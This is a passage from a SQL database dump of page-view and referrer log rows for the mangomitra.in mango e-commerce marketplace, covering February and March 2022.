07:29:02'),(204,0,0,1,543,4,'https://mangomitra.in/?add-to-cart=542','3.110.242.160','','','','2022-02-14 09:09:58'),(205,0,0,1,542,3,'https://mangomitra.in/?add-to-cart=542','3.110.242.160','','','','2022-02-14 09:45:20'),(206,0,0,1,531,4,'','3.110.242.160','','','','2022-02-15 06:58:20'),(207,9,0,0,80,1,'https://mangomitra.in/mango-recipes/','3.110.242.160','','','','2022-02-15 07:02:55'),(208,9,0,0,127,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-16 09:59:25'),(209,0,0,1,540,4,'https://mangomitra.in/','3.110.242.160','','','','2022-02-16 10:20:13'),(210,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-16 10:41:03'),(211,1,0,0,0,2,'','3.110.242.160','','','','2022-02-16 12:04:52'),(212,9,0,0,35,1,'https://mangomitra.in/my-account/','3.110.242.160','','','','2022-02-16 12:15:38'),(213,1,0,0,0,2,'','3.110.242.160','','','','2022-02-17 03:30:58'),(214,1,0,0,0,2,'','3.110.242.160','','','','2022-02-17 04:11:50'),(215,1,0,0,0,2,'','3.110.242.160','','','','2022-02-17 08:17:16'),(216,9,0,0,78,1,'','3.110.242.160','','','','2022-02-17 08:17:22'),(217,0,0,1,537,4,'https://www.google.com','3.110.242.160','','','','2022-02-17 09:34:41'),(218,0,0,1,536,3,'https://www.google.com','3.110.242.160','','','','2022-02-17 09:34:49'),(219,0,0,1,538,2,'https://www.google.com','3.110.242.160','','','','2022-02-17 09:34:51'),(220,0,0,1,535,2,'https://www.google.com','3.110.242.160','','','','2022-02-17 09:34:55'),(221,9,0,0,127,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-17 10:57:52'),(222,9,0,0,85,1,'https://mangomitra.in/contest-3/?cid=900&cac=content&ctx=page&cm=1&pid=prizes','3.110.242.160','','','','2022-02-17 11:00:47'),(223,9,0,0,35,1,'https://mangomitra.in/product-tag/pre-order/','3.110.242.160','','','','2022-02-17 11:19:38'),(224,0,0,1,532,2,'https://mangomitra.in/product-category/mangoes/?add-to-cart=532','3.110.242.160','','','','2022-02-17 11:22:55'),(225,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-17 11:26:37'),(226,0,0,1,596,2,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-02-17 11:31:56'),(227,0,0,1,637,5,'https://mangomitra.in/product/aaaa/','3.110.242.160','','','','2022-02-17 11:32:16'),(228,9,0,0,80,1,'','3.110.242.160','','','','2022-02-19 17:03:27'),(229,9,0,0,35,1,'','3.110.242.160','','','','2022-02-19 17:55:17'),(230,9,0,0,36,1,'','3.110.242.160','','','','2022-02-19 18:44:00'),(231,0,0,1,542,3,'','3.110.242.160','','','','2022-02-19 19:45:57'),(232,0,0,1,539,3,'','3.110.242.160','','','','2022-02-19 19:45:59'),(233,9,0,0,85,1,'','3.110.242.160','','','','2022-02-19 19:46:04'),(234,0,0,1,530,1,'','3.110.242.160','','','','2022-02-19 19:46:08'),(235,0,0,1,538,2,'','3.110.242.160','','','','2022-02-19 19:46:09'),(236,9,0,0,38,1,'','3.110.242.160','','','','2022-02-19 19:46:12'),(237,0,0,1,540,4,'','3.110.242.160','','','','2022-02-19 19:46:15'),(238,9,0,0,37,1,'','3.110.242.160','','','','2022-02-19 19:46:17'),(239,0,0,1,543,4,'','3.110.242.160','','','','2022-02-19 19:46:20'),(240,9,0,0,78,1,'','3.110.242.160','','','','2022-02-19 19:46:21'),(241,0,0,1,590,2,'','3.110.242.160','','','','2022-02-19 19:46:27'),(242,9,0,0,77,1,'','3.110.242.160','','','','2022-02-19 19:46:30'),(243,0,0,1,596,2,'','3.110.242.160','','','','2022-02-19 19:46:34'),(244,9,0,0,76,1,'','3.110.242.160','','','','2022-02-19 19:46:36'),(245,0,0,1,533,3,'','3.110.242.160','','','','2022-02-19 19:46:39'),(246,0,0,1,532,2,'','3.110.242.160','','','','2022-02-19 19:46:45'),(247,9,0,0,79,1,'','3.110.242.160','','','','2022-02-19 19:46:57'),(248,0,0,1,536,3,'','3.110.242.160','','','','2022-02-19 19:47:03'),(249,0,0,1,541,2,'','3.110.242.160','','','','2022-02-19 19:47:05'),(250,0,0,1,537,4,'','3.110.242.160','','','','2022-02-19 19:47:07'),(251,0,0,1,637,5,'','3.110.242.160','','','','2022-02-19 19:47:10'),(252,0,0,1,531,4,'','3.110.242.160','','','','2022-02-19 19:47:12'),(253,0,0,1,534,4,'','3.110.242.160','','','','2022-02-19 19:47:16'),(254,0,0,1,535,2,'','3.110.242.160','','','','2022-02-19 21:21:56'),(255,1,0,0,0,2,'','3.110.242.160','','','','2022-02-19 22:20:29'),(256,0,0,1,530,1,'','3.110.242.160','','','','2022-02-19 23:58:13'),(257,0,1,0,0,2,'','3.110.242.160','','','','2022-02-20 01:30:43'),(258,0,0,1,537,4,'','3.110.242.160','','','','2022-02-20 05:17:49'),(259,0,1,0,0,2,'','3.110.242.160','','','','2022-02-20 05:33:41'),(260,0,1,0,0,2,'','3.110.242.160','','','','2022-02-20 05:50:47'),(261,0,1,0,0,2,'','3.110.242.160','','','','2022-02-20 06:08:30'),(262,0,1,0,0,2,'','3.110.242.160','','','','2022-02-20 06:26:48'),(263,0,1,0,0,2,'','3.110.242.160','','','','2022-02-20 06:53:32'),(264,0,1,0,0,2,'','3.110.242.160','','','','2022-02-20 07:45:43'),(265,0,0,1,531,4,'','3.110.242.160','','','','2022-02-21 03:11:30'),(266,0,0,1,534,4,'','3.110.242.160','','','','2022-02-21 16:13:49'),(267,9,0,0,85,1,'','3.110.242.160','','','','2022-02-21 17:46:40'),(268,1,0,0,0,2,'','3.110.242.160','','','','2022-02-21 20:21:18'),(269,9,0,0,35,1,'','3.110.242.160','','','','2022-02-21 20:21:29'),(270,9,0,0,36,1,'','3.110.242.160','','','','2022-02-21 20:21:33'),(271,9,0,0,37,1,'','3.110.242.160','','','','2022-02-21 20:21:38'),(272,9,0,0,76,1,'','3.110.242.160','','','','2022-02-21 20:21:42'),(273,9,0,0,38,1,'','3.110.242.160','','','','2022-02-21 20:21:47'),(274,9,0,0,77,1,'','3.110.242.160','','','','2022-02-21 20:21:54'),(275,9,0,0,78,1,'','3.110.242.160','','','','2022-02-21 20:21:59'),(276,9,0,0,79,1,'','3.110.242.160','','','','2022-02-21 20:22:03'),(277,9,0,0,80,1,'','3.110.242.160','','','','2022-02-21 20:22:09'),(278,0,0,1,542,3,'','3.110.242.160','','','','2022-02-21 20:22:19'),(279,0,0,1,541,2,'','3.110.242.160','','','','2022-02-21 20:22:22'),(280,0,0,1,540,4,'','3.110.242.160','','','','2022-02-21 20:22:25'),(281,0,0,1,539,3,'','3.110.242.160','','','','2022-02-21 20:22:28'),(282,0,0,1,538,2,'','3.110.242.160','','','','2022-02-21 20:22:31'),(283,0,0,1,537,4,'','3.110.242.160','','','','2022-02-21 20:22:35'),(284,0,0,1,536,3,'','3.110.242.160','','','','2022-02-21 20:22:38'),(285,0,0,1,535,2,'','3.110.242.160','','','','2022-02-21 20:22:41'),(286,0,0,1,534,4,'','3.110.242.160','','','','2022-02-21 20:22:44'),(287,0,0,1,533,3,'','3.110.242.160','','','','2022-02-21 20:22:47'),(288,0,0,1,532,2,'','3.110.242.160','','','','2022-02-21 20:22:51'),(289,0,0,1,531,4,'','3.110.242.160','','','','2022-02-21 20:22:54'),(290,0,0,1,530,1,'','3.110.242.160','','','','2022-02-21 20:22:57'),(291,0,0,1,529,2,'','3.110.242.160','','','','2022-02-21 20:23:00'),(292,0,0,1,637,5,'','3.110.242.160','','','','2022-02-21 20:23:03'),(293,0,0,1,596,2,'','3.110.242.160','','','','2022-02-21 20:23:07'),(294,0,0,1,612,3,'','3.110.242.160','','','','2022-02-21 20:23:10'),(295,0,0,1,590,2,'','3.110.242.160','','','','2022-02-21 20:23:13'),(296,0,0,1,543,4,'','3.110.242.160','','','','2022-02-21 20:23:16'),(297,9,0,0,127,1,'','3.110.242.160','','','','2022-02-21 20:23:36'),(298,9,0,0,128,1,'','3.110.242.160','','','','2022-02-21 20:23:40'),(299,9,0,0,129,1,'','3.110.242.160','','','','2022-02-21 20:23:46'),(300,9,0,0,127,1,'','3.110.242.160','','','','2022-02-22 00:46:12'),(301,9,0,0,37,1,'','3.110.242.160','','','','2022-02-22 01:39:21'),(302,9,0,0,128,1,'','3.110.242.160','','','','2022-02-22 02:45:16'),(303,0,0,1,529,2,'','3.110.242.160','','','','2022-02-22 04:16:51'),(304,9,0,0,129,1,'','3.110.242.160','','','','2022-02-22 05:38:41'),(305,9,0,0,36,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-22 10:57:10'),(306,9,0,0,79,1,'https://mangomitra.in/checkout/order-received/998/?key=wc_order_UhWHB4wppUPMb','3.110.242.160','','','','2022-02-22 11:49:50'),(307,0,0,1,535,2,'','3.110.242.160','','','','2022-02-22 13:34:24'),(308,0,0,1,541,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-22 17:28:06'),(309,9,0,0,35,1,'https://mangomitra.in/my-account/','3.110.242.160','','','','2022-02-23 11:45:38'),(310,0,0,1,1000,20,'https://mangomitra.in/store-manager/vendors-manage/20/','3.110.242.160','','','','2022-02-23 12:33:22'),(311,0,0,1,1001,20,'','3.110.242.160','','','','2022-02-23 14:56:25'),(312,1,0,0,0,2,'https://mangomitra.in/checkout/','3.110.242.160','','','','2022-02-24 04:50:35'),(313,0,1,0,0,2,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-02-24 04:50:43'),(314,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-24 04:51:48'),(315,9,0,0,77,1,'https://mangomitra.in/checkout/order-received/1002/?key=wc_order_rfidsixWomwhi','3.110.242.160','','','','2022-02-24 05:13:16'),(316,9,0,0,35,1,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-02-24 05:13:22'),(317,0,0,1,596,2,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-02-24 05:20:51'),(318,9,0,0,127,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-24 05:22:25'),(319,9,0,0,128,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-24 05:22:48'),(320,9,0,0,35,1,'https://mangomitra.in/store-manager/products/','3.110.242.160','','','','2022-02-24 10:05:42'),(321,0,0,1,1004,22,'https://mangomitra.in/product-category/mangoes/?add-to-cart=530','3.110.242.160','','','','2022-02-24 10:06:13'),(322,9,0,0,76,1,'https://mangomitra.in/my-account/','3.110.242.160','','','','2022-02-24 10:21:19'),(323,0,0,1,537,4,'https://mangomitra.in/','3.110.242.160','','','','2022-02-24 10:40:18'),(324,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-24 10:41:00'),(325,0,0,1,590,2,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-02-24 10:41:16'),(326,1,0,0,0,2,'https://mangomitra.in/checkout/','3.110.242.160','','','','2022-02-24 11:22:22'),(327,9,0,0,35,1,'https://mangomitra.in/my-account/','3.110.242.160','','','','2022-02-25 04:02:26'),(328,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-25 04:02:34'),(329,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-25 04:09:32'),(330,0,0,1,543,4,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-02-25 04:10:04'),(331,0,0,1,596,2,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-02-25 04:10:30'),(332,1,0,0,0,2,'https://mangomitra.in/cart/','3.110.242.160','','','','2022-02-25 05:19:31'),(333,9,0,0,35,1,'https://mangomitra.in/contest-3/?cid=900&cac=content&ctx=page&cm=1&pid=terms','3.110.242.160','','','','2022-02-25 05:36:06'),(334,0,1,0,0,2,'https://mangomitra.in/store-manager/orders-details/1012/','3.110.242.160','','','','2022-02-25 05:41:36'),(335,0,1,0,0,20,'','3.110.242.160','','','','2022-02-25 05:49:50'),(336,1,0,0,0,2,'https://mangomitra.in/my-account/orders/','3.110.242.160','','','','2022-02-25 06:33:58'),(337,0,0,1,532,2,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-02-25 06:34:07'),(338,9,0,0,35,1,'https://mangomitra.in/my-account/','3.110.242.160','','','','2022-02-25 10:45:35'),(339,0,1,0,0,20,'https://mangomitra.in/store-manager/','3.110.242.160','','','','2022-02-25 11:19:58'),(340,0,0,1,1000,20,'https://mangomitra.in/product-category/mangoes/?add-to-cart=532','3.110.242.160','','','','2022-02-25 11:23:06'),(341,1,0,0,0,2,'https://mangomitra.in/my-account/view-order/1017/','3.110.242.160','','','','2022-02-25 12:10:00'),(342,9,0,0,85,1,'https://mangomitra.in/mango-recipes/','3.110.242.160','','','','2022-02-25 12:13:12'),(343,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-26 07:46:12'),(344,0,0,1,536,3,'https://mangomitra.in/','3.110.242.160','','','','2022-02-26 08:34:55'),(345,0,0,1,537,4,'https://mangomitra.in/','3.110.242.160','','','','2022-02-26 08:36:58'),(346,0,0,1,539,3,'https://mangomitra.in/product/himasagar/?add-to-cart=539','3.110.242.160','','','','2022-02-26 08:37:43'),(347,0,0,1,530,1,'https://mangomitra.in/product/malgova/','3.110.242.160','','','','2022-02-26 08:38:52'),(348,0,0,1,1000,20,'https://mangomitra.in/','3.110.242.160','','','','2022-02-27 13:46:25'),(349,9,0,0,35,1,'https://mangomitra.in/cart/','3.110.242.160','','','','2022-03-01 10:09:42'),(350,0,1,0,0,22,'https://mangomitra.in/product-category/mangoes/page/2/','3.110.242.160','','','','2022-03-01 10:10:03'),(351,0,0,1,1004,22,'https://mangomitra.in/store/test-store-6/','3.110.242.160','','','','2022-03-01 10:10:26'),(352,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-03-02 05:07:57'),(353,9,0,0,127,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-02 09:31:22'),(354,9,0,0,128,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-02 09:31:37'),(355,0,1,0,0,20,'https://mangomitra.in/brand/ramanagara/','3.110.242.160','','','','2022-03-02 09:31:44'),(356,0,0,1,1001,20,'','3.110.242.160','','','','2022-03-02 21:01:12'),(357,0,0,1,1000,20,'','3.110.242.160','','','','2022-03-02 21:01:15'),(358,0,0,1,1006,22,'','3.110.242.160','','','','2022-03-02 21:01:25'),(359,0,0,1,1004,22,'','3.110.242.160','','','','2022-03-02 21:01:27'),(360,0,0,1,1000,20,'','3.110.242.160','','','','2022-03-02 21:15:39'),(361,0,1,0,0,20,'','3.110.242.160','','','','2022-03-02 21:15:40'),(362,0,1,0,0,22,'','3.110.242.160','','','','2022-03-02 21:15:42'),(363,0,0,1,1000,20,'','3.110.242.160','','','','2022-03-02 21:15:47'),(364,0,0,1,1000,20,'','3.110.242.160','','','','2022-03-02 21:15:52'),(365,0,0,1,1000,20,'','3.110.242.160','','','','2022-03-02 21:15:58'),(366,1,0,0,0,2,'https://mangomitra.in/my-account/','3.110.242.160','','','','2022-03-03 05:24:33'),(367,1,0,0,0,2,'https://mangomitra.in/my-account/','3.110.242.160','','','','2022-03-03 05:31:29'),(368,1,0,0,0,2,'https://mangomitra.in/checkout/','3.110.242.160','','','','2022-03-03 07:23:04'),(369,0,1,0,0,2,'https://mangomitra.in/checkout/','3.110.242.160','','','','2022-03-03 07:24:34'),(370,9,0,0,35,1,'https://mangomitra.in/about-us/','3.110.242.160','','','','2022-03-03 09:10:56'),(371,0,0,1,533,3,'https://mangomitra.in/product-category/mangoes/','3.110.242.160','','','','2022-03-03 09:11:25'),(372,0,0,1,1004,22,'https://mangomitra.in/product/ratnagiri/','3.110.242.160','','','','2022-03-03 09:11:42'),(373,9,0,0,76,1,'https://mangomitra.in/product/test-mango-7/','3.110.242.160','','','','2022-03-03 09:11:50'),(374,9,0,0,80,1,'https://mangomitra.in/product-category/mango-concentrate/','3.110.242.160','','','','2022-03-03 09:12:06'),(375,1,0,0,0,2,'https://mangomitra.in/product-category/dried-mango/','3.110.242.160','','','','2022-03-03 09:12:16'),(376,9,0,0,130,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-03 10:46:15'),(377,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-03 10:49:34'),(378,0,0,1,596,2,'https://mangomitra.in/product-tag/pre-order/?add-to-cart=1041','3.110.242.160','','','','2022-03-03 11:09:07'),(379,9,0,0,36,1,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-03-03 11:42:30'),(380,9,0,0,76,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-03 11:58:35'),(381,9,0,0,76,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-03 12:17:36'),(382,9,0,0,38,1,'https://mangomitra.in/product-category/mango-concentrate/','3.110.242.160','','','','2022-03-03 12:20:54'),(383,9,0,0,77,1,'https://mangomitra.in/product-category/jams-and-squashes/','3.110.242.160','','','','2022-03-03 12:21:08'),(384,9,0,0,79,1,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-03-03 12:21:23'),(385,9,0,0,80,1,'https://mangomitra.in/product-category/mango-squash/','3.110.242.160','','','','2022-03-03 12:21:35'),(386,9,0,0,130,1,'https://mangomitra.in/product-category/dried-mango/','3.110.242.160','','','','2022-03-03 12:57:35'),(387,9,0,0,77,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-04 05:11:20'),(388,9,0,0,78,1,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-03-04 05:11:44'),(389,9,0,0,79,1,'https://mangomitra.in/product-category/mango-puree/','3.110.242.160','','','','2022-03-04 05:12:05'),(390,0,0,1,538,2,'https://mangomitra.in/product-category/mango-squash/','3.110.242.160','','','','2022-03-04 05:23:48'),(391,1,0,0,0,2,'https://mangomitra.in/wp-admin/customize.php?url=httpsmangomitra.in','3.110.242.160','','','','2022-03-04 05:33:17'),(392,9,0,0,38,1,'https://mangomitra.in/product-category/mango-squash/','3.110.242.160','','','','2022-03-04 06:20:42'),(393,0,0,1,1107,21,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-03-04 06:23:08'),(394,9,0,0,37,1,'https://mangomitra.in/product/frooti-mango-drink-plastic-bottle-600ml/','3.110.242.160','','','','2022-03-04 06:24:53'),(395,9,0,0,35,1,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-03-04 06:26:14'),(396,0,0,1,1132,21,'https://mangomitra.in/store-manager/products-manage/1132/','3.110.242.160','','','','2022-03-04 07:00:09'),(397,9,0,0,37,1,'https://mangomitra.in/shop/page/2/','3.110.242.160','','','','2022-03-04 07:51:12'),(398,0,0,1,1119,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-04 08:40:43'),(399,1,0,0,0,21,'https://mangomitra.in/cart/','3.110.242.160','','','','2022-03-04 12:29:36'),(400,9,0,0,77,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-04 12:57:42'),(401,9,0,0,38,1,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-03-04 12:58:13'),(402,0,0,1,1116,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-04 13:03:42'),(403,1,0,0,0,21,'https://mangomitra.in/my-account/','3.110.242.160','','','','2022-03-07 04:31:51'),(404,9,0,0,130,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-07 04:47:33'),(405,1,0,0,0,21,'https://mangomitra.in/my-account/view-order/580/','3.110.242.160','','','','2022-03-07 05:50:46'),(406,9,0,0,37,1,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-03-07 06:49:46'),(407,0,0,1,1194,25,'https://mangomitra.in/shop/?add-to-cart=1165','3.110.242.160','','','','2022-03-07 07:22:18'),(408,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-07 07:30:49'),(409,0,0,1,1119,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-07 09:37:22'),(410,0,1,0,0,21,'https://mangomitra.in/product/totapuri-mango-3kg/','3.110.242.160','','','','2022-03-07 09:37:54'),(411,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-07 09:59:32'),(412,9,0,0,37,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-07 10:02:50'),(413,9,0,0,38,1,'https://mangomitra.in/product-category/pickle-mangoes/','3.110.242.160','','','','2022-03-07 10:02:59'),(414,9,0,0,77,1,'https://mangomitra.in/product-category/jams-and-squashes/','3.110.242.160','','','','2022-03-07 10:03:06'),(415,9,0,0,130,1,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-03-07 10:03:38'),(416,9,0,0,15,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-07 10:03:54'),(417,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-07 10:09:45'),(418,9,0,0,35,1,'https://mangomitra.in/product-tag/pre-order/','3.110.242.160','','','','2022-03-07 10:32:05'),(419,0,0,1,1087,21,'','3.110.242.160','','','','2022-03-07 11:55:31'),(420,1,0,0,0,21,'','3.110.242.160','','','','2022-03-07 19:52:41'),(421,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-08 07:39:05'),(422,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-08 15:36:23'),(423,9,0,0,35,1,'https://mangomitra.in/my-account/','3.110.242.160','','','','2022-03-08 15:37:11'),(424,9,0,0,36,1,'https://mangomitra.in/product-category/mangoes/','3.110.242.160','','','','2022-03-08 15:37:48'),(425,9,0,0,38,1,'https://mangomitra.in/product-category/pickles/','3.110.242.160','','','','2022-03-08 15:38:02'),(426,0,0,1,1114,21,'https://mangomitra.in/product-category/mangoes/','3.110.242.160','','','','2022-03-08 15:38:50'),(427,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-09 06:53:13'),(428,1,0,0,0,21,'https://mangomitra.in/bulk-booking/','3.110.242.160','','','','2022-03-09 07:43:47'),(429,0,0,1,1114,21,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-03-09 07:44:27'),(430,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-09 09:35:25'),(431,0,0,1,1194,25,'https://mangomitra.in/shop/page/3/','3.110.242.160','','','','2022-03-09 09:53:38'),(432,1,0,0,0,21,'https://mangomitra.in/checkout/','3.110.242.160','','','','2022-03-09 11:02:10'),(433,9,0,0,38,1,'','3.110.242.160','','','','2022-03-10 11:06:24'),(434,9,0,0,77,1,'','3.110.242.160','','','','2022-03-10 11:06:26'),(435,0,0,1,1194,25,'','3.110.242.160','','','','2022-03-10 11:06:28'),(436,0,0,1,1159,21,'','3.110.242.160','','','','2022-03-10 11:06:30'),(437,0,0,1,1165,21,'','3.110.242.160','','','','2022-03-10 11:06:31'),(438,0,0,1,1163,21,'','3.110.242.160','','','','2022-03-10 11:06:33'),(439,0,0,1,1069,21,'','3.110.242.160','','','','2022-03-10 11:06:35'),(440,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-11 09:07:49'),(441,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-11 10:18:07'),(442,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-11 10:18:29'),(443,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-11 10:22:03'),(444,9,0,0,36,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-11 10:23:11'),(445,0,0,1,1194,25,'https://mangomitra.in/product-category/pickles/','3.110.242.160','','','','2022-03-11 10:26:09'),(446,1,0,0,0,21,'https://mangomitra.in/wp-admin/customize.php?url=httpsmangomitra.in','3.110.242.160','','','','2022-03-11 10:32:52'),(447,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-11 10:51:02'),(448,0,0,1,1165,21,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-03-11 10:53:18'),(449,0,0,1,1129,21,'http://mangomitra.in','3.110.242.160','','','','2022-03-12 00:14:37'),(450,0,0,1,1128,21,'http://mangomitra.in','3.110.242.160','','','','2022-03-12 00:14:50'),(451,0,0,1,1114,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-12 07:27:02'),(452,0,0,1,1137,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-12 07:27:49'),(453,1,0,0,0,25,'','3.110.242.160','','','','2022-03-12 22:57:34'),(454,9,0,0,85,1,'','3.110.242.160','','','','2022-03-12 23:11:03'),(455,9,0,0,128,1,'','3.110.242.160','','','','2022-03-12 23:12:59'),(456,9,0,0,35,1,'','3.110.242.160','','','','2022-03-12 23:13:17'),(457,9,0,0,36,1,'','3.110.242.160','','','','2022-03-12 23:13:34'),(458,9,0,0,127,1,'','3.110.242.160','','','','2022-03-12 23:14:41'),(459,9,0,0,79,1,'','3.110.242.160','','','','2022-03-12 23:15:15'),(460,9,0,0,78,1,'','3.110.242.160','','','','2022-03-12 23:15:32'),(461,9,0,0,80,1,'','3.110.242.160','','','','2022-03-12 23:15:50'),(462,9,0,0,129,1,'','3.110.242.160','','','','2022-03-12 23:16:23'),(463,9,0,0,38,1,'','3.110.242.160','','','','2022-03-12 23:16:40'),(464,9,0,0,77,1,'','3.110.242.160','','','','2022-03-12 23:16:58'),(465,9,0,0,76,1,'','3.110.242.160','','','','2022-03-12 23:17:15'),(466,9,0,0,37,1,'','3.110.242.160','','','','2022-03-12 23:17:32'),(467,0,0,1,1194,25,'https://mangomitra.in/','3.110.242.160','','','','2022-03-13 11:49:46'),(468,0,0,1,1264,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-13 11:50:10'),(469,9,0,0,130,1,'https://mangomitra.in/product/testmango/','3.110.242.160','','','','2022-03-13 11:50:33'),(470,9,0,0,35,1,'https://mangomitra.in/product-category/deal-of-the-day/','3.110.242.160','','','','2022-03-13 11:50:44'),(471,0,0,1,1140,21,'https://mangomitra.in/product-category/mangoes/page/2/','3.110.242.160','','','','2022-03-13 11:51:13'),(472,9,0,0,38,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-13 11:51:34'),(473,9,0,0,77,1,'https://mangomitra.in/product-category/jams-and-squashes/','3.110.242.160','','','','2022-03-13 11:51:49'),(474,0,1,0,0,21,'https://mangomitra.in/product-category/deal-of-the-day/','3.110.242.160','','','','2022-03-13 12:01:28'),(475,9,0,0,36,1,'https://mangomitra.in/store/mainstore/','3.110.242.160','','','','2022-03-13 12:01:49'),(476,9,0,0,37,1,'https://mangomitra.in/product-category/deal-of-the-day/','3.110.242.160','','','','2022-03-13 12:02:02'),(477,0,0,1,1169,21,'https://mangomitra.in/product-category/pickle-mangoes/','3.110.242.160','','','','2022-03-13 12:02:11'),(478,1,0,0,0,25,'https://mangomitra.in/my-account/','3.110.242.160','','','','2022-03-13 12:02:55'),(479,0,0,1,1114,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-14 04:55:26'),(480,0,0,1,1111,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-14 04:59:23'),(481,1,0,0,0,25,'https://mangomitra.in/product/paper-boat-aamras-tetrapack-1l/','3.110.242.160','','','','2022-03-14 04:59:34'),(482,0,0,1,1194,25,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-03-14 04:59:42'),(483,9,0,0,38,1,'https://mangomitra.in/store-manager/enquiry-manage/3/','3.110.242.160','','','','2022-03-14 05:36:41'),(484,9,0,0,130,1,'https://mangomitra.in/product-category/jams-and-squashes/','3.110.242.160','','','','2022-03-14 05:36:50'),(485,9,0,0,37,1,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-03-14 05:37:09'),(486,0,0,1,1091,21,'https://mangomitra.in/product-category/pickle-mangoes/','3.110.242.160','','','','2022-03-14 05:37:16'),(487,0,0,1,1165,21,'https://mangomitra.in/product/maagaya-pickle/','3.110.242.160','','','','2022-03-14 05:37:40'),(488,0,0,1,1169,21,'https://mangomitra.in/product/chhunda-or-gujarati-sweet-mango-pickle-250gm/','3.110.242.160','','','','2022-03-14 05:38:06'),(489,0,0,1,1161,21,'https://mangomitra.in/product/mango-thokku-500gm/','3.110.242.160','','','','2022-03-14 05:42:52'),(490,0,1,0,0,21,'https://mangomitra.in/store-manager/messages/','3.110.242.160','','','','2022-03-14 05:58:16'),(491,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-14 07:42:12'),(492,0,0,1,1161,21,'https://mangomitra.in/?s=Malgova+&post_type=product','3.110.242.160','','','','2022-03-14 07:42:36'),(493,0,0,1,1194,25,'https://mangomitra.in/?s=Malgova+&post_type=product','3.110.242.160','','','','2022-03-14 07:43:44'),(494,0,0,1,1137,21,'https://mangomitra.in/?s=Malgova&post_type=product','3.110.242.160','','','','2022-03-14 07:45:28'),(495,0,0,1,1138,21,'https://mangomitra.in/?s=Malgova&post_type=product','3.110.242.160','','','','2022-03-14 07:46:09'),(496,1,0,0,0,25,'','3.110.242.160','','','','2022-03-14 10:28:00'),(497,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-15 04:46:43'),(498,9,0,0,127,1,'https://mangomitra.in/','3.110.242.160','','','','2022-03-15 06:26:08'),(499,0,0,1,1097,21,'https://mangomitra.in/','3.110.242.160','','','','2022-03-15 06:35:11'),(500,0,0,1,1194,25,'https://mangomitra.in/?add-to-cart=1276','3.110.242.160','','','','2022-03-15 07:49:50'),(501,1,0,0,0,25,'https://mangomitra.in/my-account/','3.110.242.160','','','','2022-03-15 07:54:36'),(502,1,0,0,0,25,'https://mangomitra.in/store-manager/products-manage/1194/','3.110.242.160','','','','2022-03-15 